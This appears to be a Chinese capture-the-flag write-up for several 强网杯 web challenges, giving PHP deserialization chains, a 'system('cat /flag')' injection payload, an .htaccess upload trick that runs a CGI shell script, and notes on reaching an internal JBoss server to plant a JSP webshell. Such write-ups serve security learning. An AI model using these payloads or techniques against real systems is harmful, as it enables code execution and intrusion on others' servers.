$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My = new sNyaIR();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV = new L4F0o0();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx = new zrVAgB();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa = new DcdRXA();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh = new R9VkbV();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF = new m2oL58();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v = new CIecTW();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6 = new bSaDnb();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo = new PTCzfW();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo->ybeKnmY = new DEGn5X();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo->ybeKnmY->tpdAnk7 = new vzURHs();
$test->ErltTLc->sQ9iP8M->qsDrtNG->VGhzS66->tgW2UXg->c1WX5it->qZfI0OC->lB9b5G5->xCsxdh5->FigpmfG->u0ma7My->vfg35pV->aa1YDXx->lZCvTCa->cO81cFh->VqvWTUF->cgQkf6v->FS7bzT6->uklXnxo->ybeKnmY->tpdAnk7->t43nVRQ = new y93b0L();

echo serialize($test);

过程中添加的多余字符直接用 ?> 绕过

即 argv=system('cat /flag');?>

[强网先锋]赌徒

构造反序列化链读 /flag

$h = new Start();
$h->name = new Info();
$h->name->file = array('filename' => new Room());
$h->name->file['filename']->a = new Room();
$h->name->file['filename']->a->filename = '/flag';

[强网先锋]寻宝

key1：

key2：

分别输入进去就行

EasyWeb

扫目录

http://121.42.242.238/files

hint.txt

Try to scan 35000-40000 ^_^.
All tables are empty except for the table where the username and password are located
Table: employee

exp.py

import os

os.system("echo 'flag';")

www.zip

It's fake.

扫出端口是36842

是登陆页面，注出admin密码

admin
99f609527226e076d668668582ac4420

.htaccess

Options +ExecCGI
AddHandler cgi-script .xx

再上传youname.xx

#! /bin/sh

echo Content-type: text/html

echo "" 

whoami

根目录有 flag 无权限

127.0.0.1:8006 有 jboss 4.0.2

frp 反代出来传个 jsp 一句话读 flag